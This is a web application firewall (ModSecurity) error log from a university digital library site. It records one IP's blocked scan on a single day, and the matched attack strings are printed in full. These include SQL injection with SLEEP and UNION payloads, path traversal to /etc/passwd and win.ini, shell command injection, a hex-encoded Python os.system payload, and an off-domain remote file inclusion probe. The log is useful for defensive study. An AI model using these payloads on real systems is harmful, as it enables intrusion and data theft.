[Tue Aug 29 11:35:22.366932 2023] [:error] [pid 1248] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:categories. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ~ found within ARGS:categories: ~31~27~20union~20all~20select~20~27hongjing~27~2c~40~40version~2d~2d"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "digilib.unla.ac.id"] [uri "/servlet/codesettree"] [unique_id "ZO11isCo-f0AAATge9sAAAAl"]
[Tue Aug 29 11:35:23.374934 2023] [:error] [pid 1294] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:apis. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../ found within ARGS:apis: ../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/api/console/api_server"] [unique_id "ZO11i8Co-f0AAAUOaW8AAABG"]
[Tue Aug 29 11:35:24.300154 2023] [:error] [pid 1303] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://notburpcollaborator.net found within TX:1: notburpcollaborator.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "digilib.unla.ac.id"] [uri "/Items/RemoteSearch/Image"] [unique_id "ZO11jMCo-f0AAAUXLlUAAABM"]
[Tue Aug 29 11:35:24.329197 2023] [:error] [pid 1294] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  'orQN'='orQN found within ARGS:username: test' AND (SELECT 4458 FROM (SELECT(SLEEP(6)))JblN) AND 'orQN'='orQN"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/classes/Login.php"] [unique_id "ZO11jMCo-f0AAAUOaXAAAABG"]
[Tue Aug 29 11:35:25.313344 2023] [:error] [pid 1353] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:post_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: SLEEP( found within ARGS:post_id: (SELECT 3 FROM (SELECT SLEEP(7))enz)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO11jcCo-f0AAAVJXmkAAAAA"]
[Tue Aug 29 11:35:26.378539 2023] [:error] [pid 1242] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:password. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ',''); found within ARGS:password: g','');import os;os.system('6563686f20224d6c566b6547744f4e7a464f597a41344e6d51344e477846633278795630644c4f45315022207c20626173653634202d64203e202f7573722f6c6f63616c2f6e6574737765657065722f77656261646d696e2f6f7574'.decode('hex'))#"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/webadmin/tools/unixlogin.php"] [unique_id "ZO11jsCo-f0AAATavxUAAAAg"]
[Tue Aug 29 11:35:27.326312 2023] [:error] [pid 1283] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:id[]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: SLEEP( found within ARGS:id[]: 1 AND (SELECT 321 FROM (SELECT(SLEEP(6)))je)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO11j8Co-f0AAAUDQVIAAAA7"]
[Tue Aug 29 11:35:27.331879 2023] [:error] [pid 1387] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:groupsIds[]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: )-- - found within ARGS:groupsIds[]: 1) AND (SELECT 3066 FROM (SELECT(SLEEP(5)))CEHy)-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO11j8Co-f0AAAVr@SYAAAAZ"]
[Tue Aug 29 11:35:28.301028 2023] [:error] [pid 963] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: --  found within ARGS:username: admin' AND 4719=4719-- GZHh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/banker/index.php"] [unique_id "ZO11kMCo-f0AAAPDoTIAAAAP"]
[Tue Aug 29 11:35:29.298504 2023] [:error] [pid 1354] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: -- - found within ARGS:id: 1 UNION ALL SELECT NULL,NULL,md5('CVE-2021-24666'),NULL,NULL,NULL-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/index.php"] [unique_id "ZO11kcCo-f0AAAVK0LkAAAAB"]
[Tue Aug 29 11:35:29.343366 2023] [:error] [pid 1277] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:clientId. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: } found within ARGS:clientId: {{id}}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "digilib.unla.ac.id"] [uri "/asyncrenderer/{{url}}"] [unique_id "ZO11kcCo-f0AAAT9PRoAAAA1"]
[Tue Aug 29 11:35:30.300146 2023] [:error] [pid 984] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:host. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:host:  cat${ifs}/etc/passwd "] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilib.unla.ac.id"] [uri "/network_test.php"] [unique_id "ZO11ksCo-f0AAAPY1ssAAAAh"]
[Tue Aug 29 11:35:31.381245 2023] [:error] [pid 1391] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:cmd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:cmd: cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilib.unla.ac.id"] [uri "/nette.micro/"] [unique_id "ZO11k8Co-f0AAAVvlIMAAAAe"]
[Tue Aug 29 11:35:32.313537 2023] [:error] [pid 1156] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:id_form. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: -- - found within ARGS:id_form: 1 UNION ALL SELECT NULL,NULL,md5(999999999),NULL,NULL,NULL,NULL,NULL-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO11lMCo-f0AAASEJbAAAAAE"]
[Tue Aug 29 11:35:32.331465 2023] [:error] [pid 1391] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filename. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../ found within ARGS:filename: ../../../../../../home/talariuser/www/app/webroot/files/2UdxkuPYBktPaU9ruKB9Vm8sOw9"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/Collector/appliancesettings/applianceSettingsFileTransfer"] [unique_id "ZO11lMCo-f0AAAVvlIYAAAAe"]
[Tue Aug 29 11:35:32.334958 2023] [:error] [pid 1156] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:data_target. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: )--  found within ARGS:data_target: vote_score = 1 AND (SELECT 3 FROM (SELECT(SLEEP(6)))gwe)-- "] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO11lMCo-f0AAASEJbEAAAAE"]
[Tue Aug 29 11:35:33.328426 2023] [:error] [pid 1290] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:arp_template_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: SLEEP( found within ARGS:arp_template_id: 1 AND (SELECT 8948 FROM (SELECT(SLEEP(6)))iIic)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO11lcCo-f0AAAUKhDIAAABC"]
[Tue Aug 29 11:35:34.314996 2023] [:error] [pid 1387] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:fingerprint. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: SLEEP( found within ARGS:fingerprint: (SELECT SLEEP(6))"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO11lsCo-f0AAAVr@TQAAAAZ"]
[Tue Aug 29 11:35:34.320848 2023] [:error] [pid 1156] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/wp-content/plugins/cab-fare-calculator/tblight.php"] [unique_id "ZO11lsCo-f0AAASEJbYAAAAE"]
[Tue Aug 29 11:35:34.367805 2023] [:error] [pid 1160] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  'sWZA'='sWZA found within ARGS:id: test' AND (SELECT 2844 FROM (SELECT(SLEEP(6)))FDTM) AND 'sWZA'='sWZA"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/classes/Master.php"] [unique_id "ZO11lsCo-f0AAASI0HwAAAAG"]
[Tue Aug 29 11:35:35.341796 2023] [:error] [pid 1359] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data:  found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO11l8Co-f0AAAVPX6EAAAAF"]
[Tue Aug 29 11:35:35.383648 2023] [:error] [pid 1166] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:queriesCnt. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:queriesCnt:  cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilib.unla.ac.id"] [uri "/"] [unique_id "ZO11l8Co-f0AAASOUtUAAAAR"]
[Tue Aug 29 11:36:25.107399 2023] [:error] [pid 1307] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:table_name. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ); --\\x22 found within ARGS:table_name: pg_user\\x22; select pg_sleep(6); --\\x22"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/api/v2/open/rowsInfo"] [unique_id "ZO11ycCo-f0AAAUbg6IAAABQ"]
[Tue Aug 29 11:36:25.243849 2023] [:error] [pid 1409] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file_name. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../..// found within ARGS:file_name: ../../../../../..//etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/cgi-bin/tsaupload.cgi"] [unique_id "ZO11ycCo-f0AAAWBBP0AAAAB"]
[Tue Aug 29 11:36:25.522829 2023] [:error] [pid 1423] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:file: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilib.unla.ac.id"] [uri "/index.php"] [unique_id "ZO11ycCo-f0AAAWPpXEAAAAH"]
[Tue Aug 29 11:36:26.042976 2023] [:error] [pid 1434] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/index.php"] [unique_id "ZO11ysCo-f0AAAWa-UAAAAAI"]
[Tue Aug 29 11:36:27.172894 2023] [:error] [pid 1307] [client 143.42.78.27] ModSecurity: Rule 7fe1c67ac3c8 [id "981246"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "239"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "digilib.unla.ac.id"] [uri "/xmlpserver/services/XMLPService"] [unique_id "ZO11y8Co-f0AAAUbg64AAABQ"]
[Tue Aug 29 11:36:28.368226 2023] [:error] [pid 1449] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../../../ found within ARGS:file: ../../../../../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/ccmivr/IVRGetAudioFile.do"] [unique_id "ZO11zMCo-f0AAAWpXf0AAAAW"]
[Tue Aug 29 11:36:28.412538 2023] [:error] [pid 1446] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:true_path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../ found within ARGS:true_path: ../../../../../../windows/win.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/index.php/Pan/ShareUrl/downloadSharedFile"] [unique_id "ZO11zMCo-f0AAAWmodUAAAAS"]
[Tue Aug 29 11:36:30.372267 2023] [:error] [pid 1405] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:folder. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../../../ found within ARGS:folder: ../../../../../../../../../../../../../../../etc/"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/index.php"] [unique_id "ZO11zsCo-f0AAAV9by4AAAAA"]
[Tue Aug 29 11:36:32.377589 2023] [:error] [pid 1448] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/index.php"] [unique_id "ZO110MCo-f0AAAWoV1MAAAAV"]
[Tue Aug 29 11:36:33.506284 2023] [:error] [pid 1407] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:page. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../ found within ARGS:page: ../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/pandora_console/ajax.php"] [unique_id "ZO110cCo-f0AAAV-t@kAAAAF"]
